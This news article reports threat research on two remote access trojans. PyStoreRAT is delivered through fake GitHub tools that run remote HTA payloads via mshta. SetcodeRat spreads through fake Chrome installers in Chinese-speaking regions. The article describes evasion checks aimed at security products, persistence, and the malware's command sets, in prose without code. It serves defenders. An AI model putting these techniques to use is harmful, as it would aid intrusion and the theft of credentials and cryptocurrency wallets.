Cybersecurity researchers are calling attention to a new campaign that leverages GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
GitHub Repositories Used as a Malware Delivery Vehicle
“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report.
Researchers describe PyStoreRAT as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. In addition, the malware deploys an information stealer known as Rhadamanthys as a follow-on payload.
Attack chains rely on Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. These lures deliberately appeal to analysts and developers.
The earliest signs of the campaign date back to mid-June 2025, followed by a steady stream of repositories published since then. Threat actors promote these tools through social media platforms such as YouTube and X. At the same time, they artificially inflate repository star and fork metrics, a technique reminiscent of the Stargazers Ghost Network.
The threat actors behind the campaign use either newly created GitHub accounts or accounts that remained dormant for months to publish the repositories. Subsequently, they stealthily introduce the malicious payload through “maintenance” commits in October and November, after the tools gain popularity and appear on GitHub’s top trending lists.
In fact, many of the tools fail to function as advertised. Some display only static menus or non-interactive interfaces, while others perform minimal placeholder operations. Through this approach, the attackers abuse GitHub’s inherent trust and deceive users into executing the loader stub that initiates the infection chain.
HTA Payload Execution and System Profiling Capabilities
This process triggers the execution of a remote HTML Application (HTA) payload, which subsequently delivers PyStoreRAT. The malware profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet-related files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub collects a list of installed antivirus products and checks for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs), likely in an attempt to reduce visibility. If it detects these products, it launches “mshta.exe” via “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution.
The malware establishes persistence by creating a scheduled task disguised as an NVIDIA app self-update. In the final stage, it contacts an external server to retrieve commands for execution on the infected host. Supported commands include:
- Download and execute EXE payloads, including Rhadamanthys
- Download and extract ZIP archives
- Download a malicious DLL and execute it using “rundll32.exe”
- Fetch raw JavaScript code and execute it dynamically in memory using
eval() - Download and install MSI packages
- Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
- Execute PowerShell commands directly in memory
- Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
- Delete the scheduled task to remove the forensic trail
Attribution and Threat Actor Assessment
Researchers have not identified the operators behind the campaign. However, Morphisec noted that Russian-language artifacts and coding patterns point to a likely Eastern European threat actor.
“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”
Meanwhile, the disclosure follows a separate report from Chinese security vendor QiAnXin, which detailed another remote access trojan (RAT) codenamed SetcodeRat that has likely spread across the country since October 2025 through malvertising lures. According to the company, the campaign infected hundreds of computers, including systems belonging to governments and enterprises, within a single month.
“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”
The malware disguises itself as legitimate installers for popular programs such as Google Chrome and advances to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW). It also terminates execution if it fails to connect to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”).
In the next stage, the malware launches an executable named “pnm2png.exe” to sideload “zlib1.dll.” The DLL then decrypts the contents of a file named “qt.conf” and executes it. The decrypted payload consists of a DLL that embeds the RAT. SetcodeRat can connect to either Telegram or a traditional command-and-control (C2) server to retrieve instructions and carry out data theft.
The malware enables attackers to take screenshots, log keystrokes, read and modify folders, start processes, run “cmd.exe,” establish socket connections, collect system and network information, and update itself to newer versions.
Source: TheHackerNews
Read more at Impreza News
